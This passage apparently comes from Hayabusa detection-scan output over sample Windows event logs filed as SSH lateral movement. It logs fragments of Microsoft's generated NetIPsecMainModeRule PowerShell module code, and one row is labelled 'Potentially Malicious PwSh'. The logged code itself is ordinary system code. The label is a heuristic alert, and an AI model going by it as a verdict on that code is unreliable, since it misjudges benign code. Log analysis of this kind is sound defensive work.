[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 